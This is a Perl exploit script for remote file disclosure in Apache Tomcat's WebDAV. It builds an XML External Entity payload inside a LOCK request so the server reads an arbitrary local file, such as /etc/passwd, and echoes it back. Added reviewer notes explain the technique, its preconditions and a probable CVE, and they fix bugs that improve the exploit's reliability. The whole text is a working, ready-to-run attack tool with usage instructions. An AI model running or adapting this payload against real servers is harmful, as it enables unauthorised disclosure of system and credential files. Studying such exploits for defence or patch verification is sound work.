apache-disclose.txt
Posted on 16 October 2007
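#!/usr/bin/perl
#******************************************************
# Apache Tomcat Remote File Disclosure Zeroday Xploit
# kcdarookie aka eliteb0y / 2007
#
# thanx to the whole team & andi :)
# +++KEEP PRIV8+++
#
# This Bug may reside in different WebDav implementations,
# Warp your mind!
# +You will need auth for the exploit to work...
#******************************************************
#
# Reviewer notes
#
#   * Technique: XML External Entity (XXE) injection through the WebDAV
#     LOCK method. The request body declares an external entity whose
#     SYSTEM identifier is a server-side file path and references that
#     entity inside <D:owner>. The script simply dumps the raw HTTP
#     response; if the server expands the entity and echoes the owner
#     element back (as WebDAV lock discovery typically does), the file
#     contents appear in that response.
#   * NOTE(review): this looks like the 2007 Tomcat WebDAV issue later
#     tracked as CVE-2007-5461 -- confirm against the advisory before
#     citing it anywhere.
#   * Preconditions, as the original author states: a WebDAV context
#     deployed with write access and (usually) valid HTTP Basic
#     credentials for it. Only Basic auth is implemented (see FIXME).
#   * Limitation of the technique: the target file is parsed as XML
#     text, so binary files or text containing a bare '&' or '<' will
#     generally make the parser reject the entity instead of disclosing
#     it.
#   * Operational caveat: username and password are taken from the
#     command line and are visible in the process list to other local
#     users for the lifetime of the script.
#
# Changes versus the original script:
#   - strict/warnings, lexical variables, checked socket creation.
#   - encode_base64() is called with an empty line terminator; the
#     default appends "\n", which put a bare newline inside the
#     Authorization header and could end the header block early.
#   - request/body construction split into pure helpers so they can be
#     unit-tested without a network; the script body runs only when the
#     file is executed directly (modulino pattern).

use strict;
use warnings;
use IO::Socket::INET;
use MIME::Base64 qw(encode_base64);

### FIXME! Maybe support other auths too ?

# SET REMOTE PORT HERE
our $remoteport = 8080;

# Print the banner and invocation help, then exit.
sub usage {
    print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
    print "kcdarookie aka eliteb0y / 2007\n";
    print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n";
    print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";
    exit;
}

# Build the XML body of the LOCK request.
#
# $remotefile is the server-side path to read. It becomes the SYSTEM
# identifier of an external entity that is referenced from within
# <D:owner>/<D:href>, so the server's own XML parser resolves it.
#
# Returns the body as a string with a trailing newline.
# Dies if $remotefile contains a double quote, because that would
# terminate the SYSTEM literal early and the server would reject the DTD.
sub build_lock_body {
    my ($remotefile) = @_;

    die "file to retrieve must not contain a double quote: $remotefile\n"
        if $remotefile =~ /"/;

    return join "\n",
        '<?xml version="1.0"?>',
        '<!DOCTYPE REMOTE [',
        qq{<!ENTITY RemoteX SYSTEM "$remotefile">},
        ']>',
        q{<D:lockinfo xmlns:D='DAV:'>},
        '<D:lockscope><D:exclusive/></D:lockscope>',
        '<D:locktype><D:write/></D:locktype>',
        '<D:owner>',
        '<D:href>',
        '<REMOTE>',
        '<RemoteX>&RemoteX;</RemoteX>',   # the external entity is expanded here
        '</REMOTE>',
        '</D:href>',
        '</D:owner>',
        '</D:lockinfo>',
        '';                                # trailing newline
}

# Assemble the raw HTTP/1.1 LOCK request.
#
# $hostname   - value for the Host header
# $webdavfile - request target (the WebDAV context / resource path);
#               it is interpolated verbatim, so it must not contain
#               whitespace
# $body       - XML body from build_lock_body()
# $username   - optional; when empty or undefined no Authorization
#               header is sent
# $password   - optional; treated as '' when undefined
#
# Returns the complete request (headers + body) as a string.
sub build_request {
    my ($hostname, $webdavfile, $body, $username, $password) = @_;

    my $request = "LOCK $webdavfile HTTP/1.1\r\n"
                . "Host: $hostname\r\n";

    if (defined $username && $username ne '') {
        my $secret = defined $password ? $password : '';
        # Second argument '' suppresses the "\n" encode_base64() appends by
        # default; a bare newline inside a header is not valid HTTP.
        my $token = encode_base64("$username:$secret", '');
        $request .= "Authorization: Basic $token\r\n";
    }

    $request .= "Content-Type: text/xml\r\n"
              . "Content-Length: " . length($body) . "\r\n"
              . "\r\n"
              . $body;

    return $request;
}

# Script entry point: parse arguments, send the LOCK request, dump the
# server's response to STDOUT.
sub main {
    usage() if @ARGV < 3;
    my ($hostname, $webdavfile, $remotefile, $username, $password) = @ARGV;

    print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n";
    print "kcdarookie aka eliteb0y / 2007\n";
    print "Launching Remote Exploit...\n";

    # The original ignored a failed connect and then crashed on the
    # print; report it properly instead.
    my $sock = IO::Socket::INET->new(
        PeerAddr => $hostname,
        PeerPort => $remoteport,
        Proto    => 'tcp',
    ) or die "connect to $hostname:$remoteport failed: $@\n";
    $| = 1;

    my $body = build_lock_body($remotefile);
    print {$sock} build_request($hostname, $webdavfile, $body, $username, $password);

    # Echo the raw response. If the target expanded the entity, the file
    # contents are embedded in its copy of the <D:owner> element.
    while (my $line = <$sock>) {
        print $line;
    }
    close $sock;

    return;
}

main() unless caller;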